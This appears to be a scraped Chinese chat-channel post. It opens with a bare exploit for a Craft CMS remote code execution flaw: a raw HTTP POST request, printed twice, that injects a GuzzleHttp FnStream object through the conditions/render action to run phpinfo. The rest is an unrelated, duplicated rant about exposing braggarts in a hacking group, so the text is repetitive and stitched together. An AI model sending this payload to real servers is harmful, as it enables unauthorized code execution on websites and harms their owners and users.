Craft CMS 远程代码执行漏洞exp
POST /index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 242Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateaction=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
POST /index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36Content-Length: 242Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateaction=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
有群友问我天天搁群里怼网络装哥大黑客,想过有没有一种可能哪天真的有那种大神来tg了被人家打脸怎么办
首先我自认为看人还是很准的,就算有人说什么自己天天打gov核心政企资产这种特别离谱的我也不会什么都不问清楚上来就怼,怼的都是那种没图没证据然后平时技术讨论半句话插不上一到成果总结就概括性瞎bb,天天打这个打那个的这类人,我觉得是装哥的概率还是很大的。我的判断不是你们想的看到战绩离谱特别厉害就判断成假的,我更多时候结合的都是他平时在群里的发言,像416这种真有东西的聊两句其实就能看出来。
其次我要是真错了也无所谓,该道歉道歉。真有这种超级大佬在群里别说道歉我跪着给他磕俩头都行。忙着巴结都来不及哪里会考虑什么打脸了尴不尴尬的事😅
首先我自认为看人还是很准的,就算有人说什么自己天天打gov核心政企资产这种特别离谱的我也不会什么都不问清楚上来就怼,怼的都是那种没图没证据然后平时技术讨论半句话插不上一到成果总结就概括性瞎bb,天天打这个打那个的这类人,我觉得是装哥的概率还是很大的。我的判断不是你们想的看到战绩离谱特别厉害就判断成假的,我更多时候结合的都是他平时在群里的发言,像416这种真有东西的聊两句其实就能看出来。
其次我要是真错了也无所谓,该道歉道歉。真有这种超级大佬在群里别说道歉我跪着给他磕俩头都行。忙着巴结都来不及哪里会考虑什么打脸了尴不尴尬的事😅
👍4